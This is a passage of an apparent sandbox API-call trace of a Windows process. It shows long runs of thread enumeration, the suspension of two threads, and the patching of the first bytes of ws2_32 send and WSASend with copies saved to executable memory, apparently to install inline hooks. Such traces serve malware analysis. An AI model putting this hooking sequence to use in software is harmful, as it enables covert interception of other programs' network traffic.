lpte=0x233f9fc) returned 1 [0167.078] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.078] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.078] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.079] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.079] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.079] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.079] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.080] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.080] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.080] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.081] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.081] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.081] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.081] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.082] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.082] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.082] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.083] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.083] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.083] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.083] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.084] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.084] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.084] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.085] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.085] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.085] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.085] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.086] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.086] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.086] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.087] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.087] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.087] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.088] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.088] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.088] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.088] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.089] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.089] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.089] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.090] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.090] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.090] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.090] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.091] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.091] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.091] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.092] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.092] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.092] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.092] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.093] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.093] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.093] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.094] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.094] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.094] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.094] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.095] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.095] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.095] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.096] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.096] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.096] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.096] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.097] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.097] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.097] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.097] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.098] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.098] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.098] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.099] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.099] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.099] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.100] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.100] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.100] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.101] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.101] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.101] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.101] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.102] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.102] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.102] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.103] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.103] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.103] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.103] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.104] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.104] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.104] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.105] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.105] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.105] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.105] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.106] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.106] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.106] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.107] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.196] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.196] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.196] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.197] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.197] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.197] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.198] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.198] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.198] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.198] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.199] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.199] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.199] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.200] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.200] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.200] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.200] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.201] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.201] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.201] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.202] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.202] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.202] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.202] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.203] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.203] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.220] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x6bc) returned 0x8c [0167.220] SuspendThread (hThread=0x8c) returned 0x0 [0167.221] CloseHandle (hObject=0x8c) returned 1 [0167.221] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x9cc) returned 0x8c [0167.221] SuspendThread (hThread=0x8c) returned 0x0 [0167.221] CloseHandle (hObject=0x8c) returned 1 [0167.320] CloseHandle (hObject=0x88) returned 1 [0167.320] GetModuleHandleA (lpModuleName="ws2_32.dll") returned 0x75bc0000 [0167.320] GetProcAddress (hModule=0x75bc0000, lpProcName="send") returned 0x75bc6f01 [0167.321] VirtualProtect (in: lpAddress=0x75bc6f01, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x74224 | out: lpflOldProtect=0x74224*=0x20) returned 1 [0167.321] VirtualAlloc (lpAddress=0x0, dwSize=0x5, flAllocationType=0x3000, flProtect=0x40) returned 0x80000 [0167.321] RtlMoveMemory (in: Destination=0x80000, Source=0x75bc6f01, Length=0x5 | out: Destination=0x80000) [0167.321] VirtualProtect (in: lpAddress=0x75bc6f01, dwSize=0x5, flNewProtect=0x20, lpflOldProtect=0x74224 | out: lpflOldProtect=0x74224*=0x40) returned 1 [0167.327] GetModuleHandleA (lpModuleName="ws2_32.dll") returned 0x75bc0000 [0167.327] GetProcAddress (hModule=0x75bc0000, lpProcName="WSASend") returned 0x75bc4406 [0167.327] VirtualProtect (in: lpAddress=0x75bc4406, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x74224 | out: lpflOldProtect=0x74224*=0x20) returned 1 [0167.327] VirtualAlloc (lpAddress=0x0, dwSize=0x5, flAllocationType=0x3000, flProtect=0x40) returned 0x90000 [0167.328] RtlMoveMemory (in: Destination=0x90000, Source=0x75bc4406, Length=0x5 | out: Destination=0x90000) [0167.328] VirtualProtect (in: lpAddress=0x75bc4406, dwSize=0x5, flNewProtect=0x20, lpflOldProtect=0x74224 | out: lpflOldProtect=0x74224*=0x40) returned 1 [0167.332] GetCurrentProcessId () returned 0x780 [0167.332] GetCurrentThreadId () returned 0xa1c [0167.333] CreateToolhelp32Snapshot (dwFlags=0x4, th32ProcessID=0x0) returned 0x88 [0167.402] Thread32First (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.402] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.402] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.403] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.403] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.403] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.403] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.404] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.404] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.404] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.405] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.405] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.405] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.405] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.406] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.406] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.406] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.407] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.407] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.407] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.407] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.408] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.408] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.408] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.409] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.409] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.409] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.410] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.410] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.410] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.411] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.411] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.411] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.411] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.412] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.412] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.412] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.413] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.413] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.413] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.414] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.414] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.414] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.414] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.415] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.415] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.415] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.416] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.416] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.416] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.416] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.417] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.417] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.417] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.418] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.418] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.418] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.418] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.419] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.419] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.419] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.420] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.420] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.420] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.420] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.421] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.421] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.421] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.422] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.422] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.422] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.422] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.423] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.423] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.423] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.424] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.424] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.424] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.424] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.425] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.425] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.425] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.426] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.426] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.426] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.426] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.427] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.427] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.427] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.428] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.428] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.428] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.429] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.429] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.429] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.430] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.430] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.430] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.430] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.431] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.431] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.431] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.432] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.432] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.432] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.432] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.433] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.433] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.433] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.434] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.434] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.434] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.434] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.435] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.435] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.435] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.435] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.555] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.556] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.556] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.556] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.556] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.557] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.557] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.557] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.557] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.558] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.558] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.558] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.559] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.559] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.559] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.559] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.560] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.560] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.560] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.561] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.561] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.561] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.561] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.562] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.562] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.562] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.563] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.563] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.563] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.563] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.564] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.564] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.564] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.565] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.565] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.565] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.565] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.566] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.566] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.566] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.567] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.567] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.567] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.567] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.568] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.568] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.568] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.569] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.569] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.569] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.570] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.570] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.570] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.571] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.571] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.571] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.571] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.572] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.572] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.572] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.573] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.573] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.573] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.573] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.574] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.574] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.574] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.575] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.575] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.575] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.575] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.576] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.576] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.576] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.577] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.577] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.577] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.577] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.578] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.578] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.578] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.579] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.579] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.579] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.580] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.580] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.580] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.581] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.581] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.581] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.582] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.582] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.582] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.582] Thread32Next (hSnapshot=0x88, 